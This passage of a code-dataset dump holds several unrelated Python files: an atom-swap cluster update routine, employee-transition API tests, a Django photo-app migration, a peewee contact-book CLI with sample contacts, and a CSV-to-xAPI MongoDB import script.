Ind1/Ind2: the two atoms to swap\n# '''\n# Update the distance matrix\n#\n# Args:\n#     dismat: distance matrix\n#     Ind1, Ind2: the indexes of two atoms that swap positions\n# '''\n\n    lendismat = len(dismat[1]) #lendismat: total number of atoms\n\n    tmp = dismat[Ind1][:] #swap the distance rows of atoms Ind1 and Ind2\n    dismat[Ind1][:] = dismat[Ind2][:] #(Ind1, other atom) -> (Ind2, other atom)\n    dismat[Ind2][:] = tmp #(Ind1, Ind2) -> (Ind2, Ind2), fixed up below\n\n    for i in range(len(dismat[1])): #update the columns of atoms other than Ind1 and Ind2\n        if (i!=Ind1)&(i!=Ind2): #(other atom, Ind1) -> (other atom, Ind2)\n            dismat[i][Ind1] = dismat[Ind1][i]\n            dismat[i][Ind2] = dismat[Ind2][i]\n\n    tmp = dismat[Ind1][Ind2] #(Ind1, Ind2) -> (Ind2, Ind2) -> (Ind2, Ind1), completed here\n    dismat[Ind1][Ind2] = dismat[Ind1][Ind1]\n    dismat[Ind1][Ind1] = tmp\n\n    tmp = dismat[Ind2][Ind1]\n    dismat[Ind2][Ind1] = dismat[Ind2][Ind2]\n    dismat[Ind2][Ind2] = tmp\n\n    return dismat\n##########\n\n\n\n\n##########\n#@def clusterswap1(ClusterDes, POS, ClusterLst, Atom1, Atom2, Ind1, Ind2, TS=0.2):\ndef clusterswap1(ClusterDes, POS, ClusterLst, Atom1, Atom2, Ind1, Ind2, TS=0.1):\n# '''\n# Update the cluster information after swapping atoms\n# This is a cleaner and more robust version of clusterswap method below\n#\n# Args:\n#     ClusterDes: Description about clusters\n#     POS: POSCAR dictionary\n#     ClusterLst: Cluster information\n#     Atom1, Atom2: Atom sublattice\n#     Ind1, Ind2: Atom indices\n# '''\n\n    ClusterNum = len(ClusterLst)\n    SumLst = [sum(POS['AtomNum'][0:i]) for i in range(POS['EleNum'])]\n\n    ClusterLst_cp = copy.deepcopy(ClusterLst) #!\n    for LstInd, Lst in enumerate(ClusterLst):\n        for Ind, AtomInd in enumerate(Lst):\n            if (Ind1 in AtomInd) | (Ind2 in AtomInd):\n                #@ClusterLst[LstInd].remove(AtomInd)\n                ClusterLst_cp[LstInd].remove(AtomInd) #!\n    ClusterLst = copy.deepcopy(ClusterLst_cp) #!\n\n    for CInd, Cluster in enumerate(ClusterDes):\n        CSize = len(Cluster[0])\n\n        if (CSize==1) & (Atom1==Cluster[0][0]):\n            #@ClusterLst[ClusterInd].append([Ind1])\n            ClusterLst[CInd].append([Ind1]) #!\n\n        elif (CSize==1) & (Atom2==Cluster[0][0]):\n            #@ClusterLst[ClusterInd].append([Ind2])\n            ClusterLst[CInd].append([Ind2]) #!\n\n        else:\n            for AtomI, Atom in enumerate([Atom1, Atom2]): #O <-> VO, Atom1=3(O), Atom2=4(VO)\n                if Atom in Cluster[0]: #e.g. Cluster = [2,3,3], i.e. [Fe,O,O]\n\n                    AtomInd = [Ind1,Ind2][AtomI] #AtomInd: index of the swapped O atom\n                    AtomLoc = Cluster[0].index(Atom) #AtomLoc=1, position of Atom1=3 within Cluster=[2,3,3]\n                    IndLst = [0]*(CSize-1)\n                    IndLstMax = []\n                    GIndLst = [0]*(CSize-1)\n\n                    GrpLst = findGrpLst(Cluster[0])\n                    PermuteLst = grporderPermute(Cluster[0],GrpLst)\n                    DistRef = grpSort(Cluster[1],PermuteLst)\n\n                    ClusterTmp = copy.deepcopy(Cluster[0]) #remove Atom1=3 from Cluster=[2,3,3]\n                    ClusterTmp.remove(Atom) #ClusterTmp = [2,3]\n                    GrpLst_tmp = findGrpLst(ClusterTmp) #!\n\n                    for Ele in ClusterTmp:\n                        IndLstMax.append(POS['AtomNum'][Ele] - 1) #IndLstMax = [7,91]\n\n                    while (IndLst[-1] <= IndLstMax[-1]):\n                        for i, Ind in enumerate(IndLst):\n                            #@GIndLst[i] = Ind + SumLst[Cluster[0][i]]\n                            GIndLst[i] = Ind + SumLst[ClusterTmp[i]] #! #GIndLst=[56,64]\n                        GIndLst.insert(AtomLoc,AtomInd) #GIndLst=[56, swapped O atom, 64]\n                        GIndLst = grpSort(GIndLst,GrpLst)\n\n                        Dist = []\n                        for i in range(CSize):\n                            for j in range(i+1,CSize):\n                                Dist.append(POS['dismat'][GIndLst[i]][GIndLst[j]])\n\n                        flag = 1\n                        Dist = grpSort(Dist,PermuteLst)\n                        for Dind, D in enumerate(Dist):\n                            #@if abs(D - DistRef[ind]) > TS:\n                            if abs(D - DistRef[Dind]) > TS: #!\n                                flag = 0\n                                break\n                        if flag:\n                            #@ClusterLst[CInd].append(list(GIndLst))\n                            if GIndLst not in ClusterLst[CInd]: #!\n                                ClusterLst[CInd].append(GIndLst) #!\n\n                        GIndLst = [0]*(CSize-1) #!\n                        #@MathKit.lstGrpAdd(IndLst,IndLstMax,GrpLst)\n                        lstGrpAdd(IndLst,IndLstMax,GrpLst_tmp) #!\n\n    return ClusterLst\n##########","sub_path":"12_DO_Calculation/1_delta_0/DVO_0125/DVO_0125_1/Script/module_cediff.py","file_name":"module_cediff.py","file_ext":"py","file_size_in_byte":36597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"234538387","text":"# -*- coding: utf-8 -*-\nfrom API.base_api import check_response_data\nfrom API.wbs.base_wbs_api import WBSAPIBaseTestMixin\nimport unittest\nimport time\nimport pytest\nfrom nose.plugins.attrib import attr\nfrom API.wbs import execute_mysql\n\n\n@attr('issues')\n#@attr('internal')\n#@attr('external')\nclass EmpTransitionTest(WBSAPIBaseTestMixin, unittest.TestCase):\n view_url = 'employee/empTransition.json'\n\n expected_response_format = {\n \"success\": bool,\n \"msg\": unicode\n }\n\n valid_time = time.strftime('%Y-%m-%d', time.localtime(time.time()+86400))\n\n @classmethod\n def clear_transition_record(cls):\n inst = execute_mysql.ExecuteMysql()\n cls.result = inst.execute_select_sql('select * from emp_transition where empId=\"322\";')\n if cls.result:\n inst.execute_delete_sql('delete from emp_transition where empId=\"322\";')\n\n @check_response_data\n def test_response_with_successful_workflow(self):\n self.maxDiff = None\n # self.response = self.do_request(self.data)\n self.expected_response = {\n \"success\": True,\n \"msg\": u'操作成功',\n \"errorCode\": None\n }\n\n @classmethod\n def setUpClass(cls):\n cls.clear_transition_record()\n\n cls.data = 'data={' \\\n '\"token\":'+ cls.generate_token() + ',' \\\n '\"param\":{' \\\n '\"empId\":\"322\",' \\\n '\"deptId\":\"7\",' \\\n '\"effectDate\":\"' + cls.valid_time + '\"'\\\n '},\"sign\":\"354d13a6f4f2e8ff58a5d93a757c1bae\"}'\n super(EmpTransitionTest, cls).setUpClass()\n\n\n@pytest.mark.issues\n#@pytest.mark.externalapi\nclass EmpTransitionAbnormalTest(WBSAPIBaseTestMixin, unittest.TestCase):\n view_url = 'employee/empTransition.json'\n\n expected_response_format = {\n \"success\": bool,\n \"msg\": unicode\n }\n\n @check_response_data\n def test_response_with_date_error(self):\n self.maxDiff = None\n self.response = self.do_request(self.data)\n self.expected_response = {\n \"success\": False,\n \"msg\": u\"异动生效日期应大于系统当前日期!\",\n \"errorCode\": None,\n }\n\n @classmethod\n def setUpClass(cls):\n cls.data = 'data={' \\\n '\"token\":' + cls.generate_token() + ',' \\\n '\"param\":{' \\\n '\"empId\":\"138\",' \\\n '\"deptId\": \"7\",' \\\n '\"effectDate\":\"2017-08-3\"' \\\n '},' \\\n '\"sign\":\"354d13a6f4f2e8ff58a5d93a757c1bae\"' \\\n '}'\n super(EmpTransitionAbnormalTest, cls).setUpClass()\n\n","sub_path":"automation-testing/API/wbs/saas/employee/tests_empTransition.py","file_name":"tests_empTransition.py","file_ext":"py","file_size_in_byte":2677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"95772437","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport django.utils.timezone\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Album',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('title', models.CharField(max_length=20)),\n ('description', models.CharField(max_length=140)),\n ('date_uploaded', models.DateField(auto_now_add=True)),\n ('date_modified', models.DateField(auto_now=True)),\n ('date_published', models.DateField()),\n ('published', models.CharField(default=b'private', max_length=7, choices=[(b'private', b'Private Photo'), (b'shared', b'Shared Photo'), (b'public', b'Public Photo')])),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='ImagrUser',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('password', models.CharField(max_length=128, verbose_name='password')),\n ('last_login', models.DateTimeField(default=django.utils.timezone.now, verbose_name='last login')),\n ('our_date_joined_field', models.DateField(auto_now_add=True)),\n ('our_is_active_field', models.BooleanField(default=False)),\n ('followers', models.ManyToManyField(related_name='followers_rel_+', to='imagr_app.ImagrUser')),\n ('following', models.ManyToManyField(related_name='following_rel_+', to='imagr_app.ImagrUser')),\n ],\n options={\n 'abstract': False,\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Photo',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('title', models.CharField(max_length=20)),\n ('description', models.CharField(max_length=140)),\n ('date_uploaded', models.DateField(auto_now_add=True)),\n ('date_modified', models.DateField(auto_now=True)),\n ('date_published', models.DateField()),\n ('published', models.CharField(default=b'private', max_length=7, choices=[(b'private', b'Private Photo'), (b'shared', b'Shared Photo'), (b'public', b'Public Photo')])),\n ('user', models.ForeignKey(to='imagr_app.ImagrUser')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='album',\n name='cover',\n field=models.ForeignKey(related_name='Album_cover', to='imagr_app.Photo'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='album',\n name='photos',\n field=models.ManyToManyField(related_name='Album_photos', to='imagr_app.Photo'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='album',\n name='user',\n field=models.ForeignKey(to='imagr_app.ImagrUser'),\n preserve_default=True,\n ),\n ]\n","sub_path":"imagr_site/imagr_app/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":3462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"442870383","text":"from peewee import Model, CharField, DateField, PostgresqlDatabase\nimport psycopg2\nfrom datetime import date\nimport os\n\n\n\ndb = PostgresqlDatabase('contact_book', user='postgres', password='',\n host='localhost', port=5432)\n\nclass BaseModel(Model):\n class Meta:\n database = db\n\nclass Person(BaseModel): \n first_name = CharField()\n last_name = CharField()\n phone_number = CharField()\n email = CharField()\n birthday = DateField()\n\ndb.connect()\ndb.drop_tables([Person])\ndb.create_tables([Person])\n\n# Populating the SQL Database\nLevani = Person(first_name = 'Levani', last_name = 'Papashvili',\n phone_number = '249-943-0303', email = 'levani@mail.com', birthday = '11/11/1984')\nLevani.save()\nCharlie = Person(first_name = 'Charlie', last_name='Smith',\n phone_number = '555-555-2524', email = 'charliedo@gmail.com', birthday = '03/09/85' )\nCharlie.save()\nSara = Person(first_name = 'Sara', last_name ='Ross',\n phone_number = '434-023-2313', email = 'saralalal@yahoo.com', birthday = '04/22/75')\nSara.save()\nLilly = Person(\n first_name = 'Lilly',\n last_name = 'Tighe',\n phone_number = '555-555-5053',\n email = 'princess@gmail.com',\n birthday = '11/13/1999'\n)\nLilly.save()\nBailey = Person(\n first_name = 'Bailey',\n last_name = 'Delin',\n phone_number = '555-240-0443',\n email = 'bobbyb@mail.com',\n birthday = '10/30/2002'\n)\nBailey.save()\nJeremy = Person(\n first_name = 'Jeremy',\n last_name = 'Johnson',\n phone_number = '555-980-6578',\n email = 'jeremypa@mail.com',\n birthday = '09/24/1982'\n)\nJeremy.save()\nGio = Person(\n first_name = 'Gio',\n last_name = 'Niparishvili',\n phone_number = '987-340-1429',\n email = 'gionb@mail.com',\n birthday = '06/07/1986'\n)\nGio.save()\nLia = Person(\n first_name = 'Lia',\n last_name = 'Rusishvili',\n phone_number = '545-340-9842',\n email = 'liarus@mail.com',\n birthday = '11/04/1785'\n)\nLia.save()\nOmari = Person(\n first_name = 'Omari',\n last_name = 'Ninoshvili',\n phone_number = '986-120-1236',\n email = 'omargs@mail.com',\n birthday = '10/30/200'\n)\nOmari.save()\nPatta = Person(\n first_name = 'Patta',\n last_name = 'Borjomi',\n phone_number = '678-340-9876',\n email = 'pattalab@mail.com',\n birthday = '09/30/2001'\n)\nPatta.save()\nAnna = Person(\n first_name = 'Anna',\n last_name = 'Mamodze',\n phone_number = '571-897-3452',\n email = 'annatya@mail.com',\n birthday = '11/02/2009'\n)\nAnna.save()\nGiorgi = Person(\n first_name = 'Giorgi',\n last_name = 'Nonoiashvil',\n phone_number = '555-876-0093',\n email = 'Giorginan@mail.com',\n birthday = '03/30/1982'\n)\nGiorgi.save()\nNatela = Person(\n first_name = 'Natela',\n last_name = 'Baliako',\n phone_number = '555-120-1643',\n email = 'natelabsd@mail.com',\n birthday = '03/05/2008'\n)\nNatela.save()\nDato = Person(\n first_name = 'Dato',\n last_name = 'Guraspashvili',\n phone_number = '555-987-0964',\n email = 'datojgf@mail.com',\n birthday = '01/06/2010'\n)\nDato.save()\nNika = Person(\n first_name = 'Nika',\n last_name = 'Sakashvili',\n phone_number = '555-090-1283',\n email = 'nikaso@mail.com',\n birthday = '07/30/1783'\n)\nNika.save()\nPapuna = Person(\n first_name = 'Papauna',\n last_name = 'Papaskiri',\n phone_number = '555-449-0089',\n email = 'papunaeee@mail.com',\n birthday = '10/01/2007'\n)\nPapuna.save()\nMaka = Person(\n first_name = 'Maka',\n last_name = 'Blaxamishvili',\n phone_number = '555-298-0983',\n email = 'makaiut@mail.com',\n birthday = '10/03/2000'\n)\nMaka.save()\nJabo = Person(\n first_name = 'Jabo',\n last_name = 
'Rosiko',\n    phone_number = '555-987-9873',\n    email = 'noklass@mail.com',\n    birthday = '04/11/1975'\n)\nJabo.save()\nScoot = Person(\n    first_name = 'Scoot',\n    last_name = 'Dior',\n    phone_number = '155-654-9543',\n    email = 'scootri@mail.com',\n    birthday = '10/03/1891'\n)\nScoot.save()\nWako = Person(\n    first_name = 'Wako',\n    last_name = 'Mamuashvili',\n    phone_number = '555-876-1543',\n    email = 'mamunsk@mail.com',\n    birthday = '01/15/2000'\n)\nWako.save()\nMariami = Person(\n    first_name = 'Mariami',\n    last_name = 'Berianidze',\n    phone_number = '555-140-1643',\n    email = 'mariamioyb@mail.com',\n    birthday = '08/09/2008'\n)\nMariami.save()\nSoso = Person(\n    first_name = 'Soso',\n    last_name = 'Bodare',\n    phone_number = '557-220-2643',\n    email = 'soson@mail.com',\n    birthday = '07/08/1988'\n)\nSoso.save()\nDatuna = Person(\n    first_name = 'Datuna',\n    last_name = 'Lkaon',\n    phone_number = '667-829-5658',\n    email = 'datunammm@mail.com',\n    birthday = '09/10/1989'\n)\nDatuna.save()\n\nNodo = Person(\n    first_name = 'Nodo',\n    last_name = 'Noniashvili',\n    phone_number = '222-429-5018',\n    email = 'nodoppp@mail.com',\n    birthday = '07/01/1980'\n)\nNodo.save()\n\n## Ending populating database\n\n#Display all of the Contacts\n\ndef show_contact():\n    contacts = Person.select()\n    for contact in contacts:\n        print(contact.first_name, contact.last_name)\n    show = input(\"Enter a last name for all of the contact information \\nthis is case sensitive: \")\n    try:\n        contact = Person.get(Person.last_name == show)\n        print(f'\\n\\nFull Name: {contact.first_name} {contact.last_name} \\nBirthday: {contact.birthday} \\nPhone Number: {contact.phone_number} \\nEmail: {contact.email} \\n')\n        introduction()\n    except: #Exception as error:\n        print('That name does not exist')\n        introduction()\n\n### Create a New Contact\ndef create_contact():\n    new_first_name = input('Insert First Name: ')\n    new_last_name = input('Insert Last Name: ')\n    new_birthday = input('Insert Birthday: ')\n    new_phone_number = input('Insert Phone Number: ')\n    new_email = input('Insert Email Address: ')\n\n    add_contact = Person(\n        first_name = new_first_name,\n        last_name = new_last_name,\n        birthday = new_birthday,\n        phone_number = new_phone_number,\n        email = new_email\n    )\n    add_contact.save()\n    introduction()\n\n# Update the contacts\n\ndef update_contact():\n    contacts = Person.select()\n    for contact in contacts:\n        print(contact.first_name, contact.last_name)\n    last_n = input('Enter the last name of the contact you want to update \\nThis is Case Sensitive: ')\n    try:\n        contact = Person.get(Person.last_name == last_n)\n        print(' 1: First name \\n 2: Last name \\n 3: Birthday \\n 4: Phone number \\n 5: Email Address')\n        ask = input('Enter number of subject to update: ')\n        if ask == '1':\n            contact.first_name = input('New first name: ')\n            contact.save()\n            introduction()\n        elif ask == '2':\n            contact.last_name = input('New last name: ')\n            contact.save()\n            introduction()\n        elif ask == '3':\n            contact.birthday = input('New birthday: ')\n            contact.save()\n            introduction()\n        elif ask == '4':\n            contact.phone_number = input('New phone number: ')\n            contact.save()\n            introduction()\n        elif ask == '5':\n            contact.email = input('New email: ')\n            contact.save()\n            introduction()\n        else:\n            introduction()\n    except:\n        print('That person does not exist')\n        introduction()\n\n#super careful and fun delete function\n\ndef delete_contact():\n    tester = input('Do you want to delete one of these hot mamas? y/n: ')\n    if tester == 'n':\n        print('thought not!')\n        introduction()\n    if tester == 'y':\n        contacts = Person.select()\n        for contact in contacts:\n            print(contact.first_name, contact.last_name)\n        bye = input('Which frienemy do you want to get rid of? \\n Enter last name: ')\n        try:\n            contact = Person.get(Person.last_name == bye)\n            sure = input('Are you sure you want to get rid of them? y/n: ')\n            if sure == 'y':\n                contact.delete_instance()\n                introduction()\n            else:\n                delete_contact()\n        except:\n            print(\"that person doesn't exist....yet\")\n            introduction()\n\n    introduction()\n\n#Function for the interactive menu\ndef introduction():\n    print('\\n\\nWelcome to Levani Contact Book \\n 1: Show Contacts \\n 2: Create Contact \\n 3: Update Contact \\n 4: Delete Contact \\n 5: Exit')\n    greet = input('Enter the number of what you want to do: ')\n    if greet == '1':\n        show_contact()\n    elif greet == '2':\n        create_contact()\n    elif greet == '3':\n        update_contact()\n    elif greet == '4':\n        delete_contact()\n    elif greet == '5':\n        print('GURL, You are done! BYE!!')\n        os._exit(1)\n    else:\n        print('GURL, that is not an option, k?')\n        introduction()\n\n### Start your engines\nintroduction()\n","sub_path":"lib/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":9291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"219680182","text":"import csv\nimport uuid\nimport datetime\nimport json\nimport sys\n\nfrom pymongo import Connection\nfrom tincan import (\n RemoteLRS,\n Statement,\n Agent,\n AgentAccount,\n Verb,\n Activity,\n Context,\n LanguageMap,\n ActivityDefinition,\n StateDocument,\n Extensions,\n Result\n)\n\n\"\"\"\n\"\"\"\ndef create_AEP_statement(row):\n\n\tcod_element, estat_solicitud, any_acad_valida, desc_estat, any_academico, idp, num_expedient, asigna_clase, estat, num_creditos, cod_plan = row\n\tstatement = Statement({\n\t 'actor': Agent({\n\t \t'account': AgentAccount({\n\t \t\t'name': idp,\n\t \t}),\n\t }),\n\t 'verb': Verb({\n\t\t 'id': 'http://la.uoc.edu/verb/aeprequest',\n\t\t 'display': LanguageMap({'en-US': 'AEP Request'}),\n\t\t}),\n\t 'object': Activity({\n\t \t'id': 'http://la.uoc.edu/object/subject/code/%s' % cod_element,\n\t\t\t'definition': ActivityDefinition({\n\t\t\t\t'extensions': Extensions({\n\t\t\t\t\t'edu:uoc:la:subject': {\n\t\t\t\t\t\t'code': cod_element,\n\t\t\t\t\t\t'credits': num_creditos,\n\t\t\t\t\t},\n\t\t\t\t\t'edu:uoc:la:plan': {\n\t\t\t\t\t\t'code': cod_plan,\n\t\t\t\t\t},\n\t\t\t\t\t'edu:uoc:la:semester': {\n\t\t\t\t\t\t'code': any_academico,\n\t\t\t\t\t\t'validated': any_acad_valida,\n\t\t\t\t\t},\n\t\t\t\t\t'edu:uoc:la:expedient': {\n\t\t\t\t\t\t'code': num_expedient,\n\t\t\t\t\t},\n\t\t\t\t\t'edu:uoc:la:aep': {\n\t\t\t\t\t\t'status': estat,\n\t\t\t\t\t\t'classification': asigna_clase\n\t\t\t\t\t}\n\t\t\t\t})\n\t\t\t})\n\t }),\n\t 'result': Result({\n\t \t'success': estat == 'A',\n\t }),\n\t 'timestamp': datetime.datetime.utcnow(),\n\t\t'context': Context({\n\t\t 'registration': uuid.uuid4(),\n\t\t})\n\t})\n\treturn json.loads(statement.to_json())\n\n\"\"\"\n\"\"\"\ndef create_Matricula_statement(row):\n\n\tdivision, num_expediente, any_academico, inv_estado_expediente, idp, anula_matricula, motiu_anulacio, cod_plan, desc_plan, cod_estudios, desc_estudios, tipo_educacion, oficial_propi, cod_area, desc_area = row\n\tstatement = Statement({\n\t 'actor': Agent({\n\t \t'account': AgentAccount({\n\t \t\t'name': idp,\n\t \t}),\n\t }),\n\t 'verb': Verb({\n\t\t 'id': 'http://la.uoc.edu/verb/enrolment',\n\t\t 'display': LanguageMap({'en-US': 'Enrolment'}),\n\t\t}),\n\t 'object': Activity({\n\t \t'id': 'http://la.uoc.edu/object/expedient/code/%s' % num_expediente,\n\t\t\t'definition': ActivityDefinition({\n\t\t\t\t'extensions': Extensions({\n\t\t\t\t\t'edu:uoc:la:expedient': {\n\t\t\t\t\t\t'code': num_expediente,\n\t\t\t\t\t\t'division': division,\n\t\t\t\t\t\t'status': inv_estado_expediente,\n\t\t\t\t\t},\n\t\t\t\t\t'edu:uoc:la:semester': {\n\t\t\t\t\t\t'code': any_academico,\n\t\t\t\t\t},\n\t\t\t\t\t'edu:uoc:la:plan': {\n\t\t\t\t\t\t'code': cod_plan,\n\t\t\t\t\t\t'description': desc_plan,\n\t\t\t\t\t},\n\t\t\t\t\t'edu:uoc:la:study': {\n\t\t\t\t\t\t'code': cod_estudios,\n\t\t\t\t\t\t'description': desc_estudios,\n\t\t\t\t\t\t'type': tipo_educacion,\n\t\t\t\t\t\t'official': oficial_propi,\n\t\t\t\t\t},\n\t\t\t\t\t'edu:uoc:la:area': {\n\t\t\t\t\t\t'code': cod_area,\n\t\t\t\t\t\t'description': desc_area,\n\t\t\t\t\t},\n\t\t\t\t\t'edu:uoc:la:enrolment': {\n\t\t\t\t\t\t'cancelation': {\n\t\t\t\t\t\t\t'date': anula_matricula,\n\t\t\t\t\t\t\t'reason': motiu_anulacio,\n\t\t\t\t\t\t},\n\t\t\t\t\t}\n\t\t\t\t})\n\t\t\t})\n\t }),\n\t 'result': Result({\n\t \t'success': not anula_matricula,\n\t }),\n\t 'timestamp': datetime.datetime.utcnow(),\n\t\t'context': Context({\n\t\t 'registration': uuid.uuid4(),\n\t\t})\n\t})\n\treturn 
json.loads(statement.to_json())\n\n\"\"\"\n\"\"\"\ndef create_ass_matr_statement(row):\n\n\tcod_asignatura, any_academic, userid, idp = row\n\tstatement = Statement({\n\t 'actor': Agent({\n\t \t'account': AgentAccount({\n\t \t\t'name': idp,\n\t \t}),\n\t }),\n\t 'verb': Verb({\n\t\t 'id': 'http://la.uoc.edu/verb/subject/enrolment',\n\t\t 'display': LanguageMap({'en-US': 'Enrolment'}),\n\t\t}),\n\t 'object': Activity({\n\t \t'id': 'http://la.uoc.edu/object/subject/code/%s' % cod_asignatura,\n\t\t\t'definition': ActivityDefinition({\n\t\t\t\t'extensions': Extensions({\n\t\t\t\t\t'edu:uoc:la:subject': {\n\t\t\t\t\t\t'code': cod_asignatura\n\t\t\t\t\t},\n\t\t\t\t\t'edu:uoc:la:semester': {\n\t\t\t\t\t\t'code': any_academic,\n\t\t\t\t\t}\n\t\t\t\t})\n\t\t\t})\n\t }),\n\t 'result': Result({\n\t }),\n\t 'timestamp': datetime.datetime.utcnow(),\n\t\t'context': Context({\n\t\t 'registration': uuid.uuid4(),\n\t\t})\n\t})\n\treturn json.loads(statement.to_json())\n\n\"\"\"\n\"\"\"\ndef create_Performance_statement(row):\n\n\tdivision, num_expediente, idp, cod_asignatura, desc_assignatura, af, nf, supera_s_n, seguiment_ac_s_n, tipus_examen, qe, qualificacio_teorica, nota_prova_validacio, cod_estudios, desc_estudios, codi_aula, any_academic = row\n\tstatement = Statement({\n\t 'actor': Agent({\n\t \t'account': AgentAccount({\n\t \t\t'name': idp,\n\t \t}),\n\t }),\n\t 'verb': Verb({\n\t\t 'id': 'http://la.uoc.edu/verb/performance',\n\t\t 'display': LanguageMap({'en-US': 'Enrolment'}),\n\t\t}),\n\t 'object': Activity({\n\t \t'id': 'http://la.uoc.edu/object/expedient/code/%s' % num_expediente,\n\t\t\t'definition': ActivityDefinition({\n\t\t\t\t'extensions': Extensions({\n\t\t\t\t\t'edu:uoc:la:expedient': {\n\t\t\t\t\t\t'code': num_expediente,\n\t\t\t\t\t\t'division': division,\n\t\t\t\t\t},\n\t\t\t\t\t'edu:uoc:la:subject': {\n\t\t\t\t\t\t'code': cod_asignatura,\n\t\t\t\t\t\t'description': desc_assignatura,\n\t\t\t\t\t\t'evaluation': {\n\t\t\t\t\t\t\t'af': af,\n\t\t\t\t\t\t\t'nf': nf,\n\t\t\t\t\t\t\t'ac': {\n\t\t\t\t\t\t\t\t'follows': seguiment_ac_s_n == 'Si',\n\t\t\t\t\t\t\t\t'pass': supera_s_n == 'Si',\n\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t'examType': tipus_examen,\n\t\t\t\t\t\t\t'qe': qe,\n\t\t\t\t\t\t\t'qt': qualificacio_teorica,\n\t\t\t\t\t\t\t'validationTest': {\n\t\t\t\t\t\t\t\t'qualification': nota_prova_validacio\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t}\n\t\t\t\t\t},\n\t\t\t\t\t'edu:uoc:la:semester': {\n\t\t\t\t\t\t'code': any_academic,\n\t\t\t\t\t},\n\t\t\t\t\t'edu:uoc:la:study': {\n\t\t\t\t\t\t'code': cod_estudios,\n\t\t\t\t\t\t'description': desc_estudios,\n\t\t\t\t\t},\n\t\t\t\t\t'edu:uoc:la:classroom': {\n\t\t\t\t\t\t'code': codi_aula,\n\t\t\t\t\t},\n\t\t\t\t})\n\t\t\t})\n\t }),\n\t 'result': Result({\n\t }),\n\t 'timestamp': datetime.datetime.utcnow(),\n\t\t'context': Context({\n\t\t 'registration': uuid.uuid4(),\n\t\t})\n\t})\n\treturn json.loads(statement.to_json())\n\n\"\"\"\n\"\"\"\ndef create_login_logout_statement(row):\n\n print(row)\n if len(row) == 5:\n userid, login, logout, ip, lastaction = row\n else:\n return json.loads(\"{}\")\n\n try:\n logintime = datetime.datetime.strptime(login, \"%d%m%Y%H%M%S\").isoformat()\n logouttime = datetime.datetime.strptime(logout, \"%d%m%Y%H%M%S\").isoformat()\n lastactiontime = datetime.datetime.strptime(lastaction, \"%d%m%Y%H%M%S\").isoformat()\n except ValueError:\n logintime = ''\n logouttime = ''\n lastactiontime = ''\n\n statement = Statement({\n\t 'actor': Agent({\n\t \t'account': AgentAccount({\n\t \t\t'name': userid,\n\t \t}),\n\t }),\n\t 'verb': 
Verb({\n\t\t 'id': 'http://la.uoc.edu/verb/login',\n\t\t 'display': LanguageMap({'en-US': 'Login'}),\n\t\t}),\n\t 'object': Activity({\n\t \t'id': 'http://la.uoc.edu/object/login',\n\t\t\t'definition': ActivityDefinition({\n\t\t\t\t'extensions': Extensions({\n\t\t\t\t\t'edu:uoc:la:campus': {\n 'userid': userid,\n\t\t\t\t\t},\n\t\t\t\t\t'edu:uoc:la:login': {\n 'login': logintime,\n 'logout': logouttime,\n 'lastactiontime': lastactiontime,\n },\n\t\t\t\t})\n\t\t\t})\n\t }),\n\t 'result': Result({\n\t }),\n\t 'timestamp': datetime.datetime.utcnow(),\n\t\t'context': Context({\n\t\t 'registration': uuid.uuid4(),\n\t\t})\n\t})\n return json.loads(statement.to_json())\n\n\"\"\"\n\"\"\"\ndef import_aep(collection):\n\twith open('data/Dataset_Graus_2008-09_20141_Assig_Conv_Adap_AEP.csv', 'rb') as csvfile:\n\t\treader = csv.reader(csvfile, delimiter=';', quotechar='\"')\n\t\tnext(reader, None)\n\t\tcollection.insert([create_AEP_statement(row) for row in reader])\n\n\"\"\"\n\"\"\"\ndef import_enrolment(collection):\n\twith open('data/Dataset_Graus_2008-09_20141_Matricula.csv', 'rb') as csvfile:\n\t\treader = csv.reader(csvfile, delimiter=';', quotechar='\"')\n\t\tnext(reader, None)\n\t\tcollection.insert([create_Matricula_statement(row) for row in reader])\n\n\"\"\"\n\"\"\"\ndef import_performance(collection):\n\twith open('data/Dataset_Graus_2008-09_20141_Rendiment_Assignatures.csv', 'rb') as csvfile:\n\t\treader = csv.reader(csvfile, delimiter=';', quotechar='\"')\n\t\tnext(reader, None)\n\t\tcollection.insert([create_Performance_statement(row) for row in reader])\n\n\"\"\"\n\"\"\"\ndef import_assmatr(collection):\n with open('data/matricula_per_usuaris_i_aules.csv', 'rb') as csvfile:\n reader = csv.reader(csvfile, delimiter=';', quotechar='\"')\n next(reader, None)\n collection.insert([create_ass_matr_statement(row) for row in reader])\n\"\"\"\n\"\"\"\ndef import_login_logout(collection):\n with open('data/loginhistory.csv', 'rU') as csvfile:\n reader = csv.reader(csvfile, delimiter=';', quotechar='\"')\n next(reader, None)\n for row in reader:\n collection.insert(create_login_logout_statement(row))\n\n\"\"\"\n\"\"\"\ncsv.field_size_limit(sys.maxsize)\n\nconnection = Connection('localhost', 27017)\ndb = connection.lrs\ncollection = 